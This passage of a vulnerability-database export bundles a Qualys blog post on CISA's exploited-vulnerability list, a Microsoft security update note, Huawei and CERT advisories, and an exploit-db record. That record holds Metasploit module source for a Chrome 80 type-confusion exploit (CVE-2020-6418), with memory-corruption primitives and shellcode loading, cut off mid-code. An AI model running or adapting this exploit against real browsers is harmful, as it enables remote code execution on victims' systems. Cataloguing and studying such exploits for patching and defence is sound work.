1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-24T11:29:05", "description": "None\nNEW \n**IMPORTANT **We have been evaluating the public health situation, and we understand this is impacting our customers. In response to these challenges, we are prioritizing our focus on security updates. Starting in May 2020, we are pausing all optional non-security releases (C and D updates) for all the supported versions of Windows client and server products (Windows 10, version 1909 down to Windows Server 2008 SP2).There is no change to the monthly security updates (B release \u2013 Update Tuesday); these will continue as planned to ensure business continuity and to keep our customers protected and productive.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to Windows Kernel, Windows App Platform and Frameworks, Microsoft Graphics Component, Windows Media, Windows Fundamentals, Windows Core Networking, and the Microsoft JET Database Engine.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4540725) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4550970>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4550970](<https://download.microsoft.com/download/1/b/5/1b5db5d6-ea6e-4677-b4b1-04bf31735622/4550970.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mskb", "title": "April 14, 2020\u2014KB4550970 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-14T07:00:00", "id": "KB4550970", "href": "https://support.microsoft.com/en-us/help/4550970", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2021-12-30T12:25:57", "description": "Microsoft released a security advisory to disclose an elevation of privilege vulnerability which exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. (Vulnerability ID: HWPSIRT-2020-04145)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-1027.\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200805-01-windows-en>\n\n \n\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-05T00:00:00", "type": "huawei", "title": "Security Advisory - Elevation of Privilege Vulnerability in Some Microsoft Windows Systems", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-08-05T00:00:00", "id": "HUAWEI-SA-20200805-01-WINDOWS", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200805-01-windows-en", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:50:22", "description": "### Overview\n\nMicrosoft Windows contains two vulnerabilities in the parsing of Adobe Type 1 fonts, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nAdobe Type Manager, which is provided by `atmfd.dll`, is a kernel module that is provided by Windows and provides support for OpenType fonts. Two vulnerabilities in the Microsoft Windows Adobe Type Manager library may allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system. This vulnerability affects all supported versions of Windows, as well as Windows 7. This vulnerability is being exploited in the wild. \n \n--- \n \n### Impact\n\nBy causing a Windows system to open a specially crafted document or view it in the Windows preview pane, an unauthenticated remote attacker may be able to execute arbitrary code with kernel privileges on a vulnerable system. Windows 10 based operating systems would execute the code with limited privileges, in an [AppContainer](<https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>) sandbox. \n \n--- \n \n### Solution\n\n**Apply an update**\n\nThis issue has been addressed in [Microsoft updates for CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>). Please also consider the following workarounds that are listed in [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>): \n \n--- \n \n**Rename ATMFD.DLL** \n \nThis mitigation appears to be to the most effective workaround for this vulnerability, as it blocks the vulnerable code from being used by Windows. Please see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. Because supported Windows 10 versions do not use ATMFD.DLL, this mitigation is not applicable on those platforms. \n \n**Disable the preview pane and details pane in Windows Explorer** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n**Disable the WebClient service** \n \nPlease see [Microsoft Security Advisory ADV200006](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>) for more details. \n \n--- \n \n### Vendor Information\n\n354840\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Affected\n\nNotified: March 23, 2020 Updated: April 14, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9 | E:F/RL:W/RC:C \nEnvironmental | 9.0 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006>\n * <https://docs.microsoft.com/en-us/windows/win32/secauthz/appcontainer-isolation>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-1020](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-1020>) \n---|--- \n**Date Public:** | 2020-03-23 \n**Date First Published:** | 2020-03-23 \n**Date Last Updated: ** | 2020-04-14 18:00 UTC \n**Document Revision: ** | 26 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-23T00:00:00", "type": "cert", "title": "Microsoft Windows Type 1 font parsing remote code execution vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T18:00:00", "id": "VU:354840", "href": "https://www.kb.cert.org/vuls/id/354840", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:07:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "exploitdb", "title": "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-6418", "CVE-2020-6418"], "modified": "2020-03-09T00:00:00", "id": "EDB-ID:48186", "href": "https://www.exploit-db.com/exploits/48186", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. We 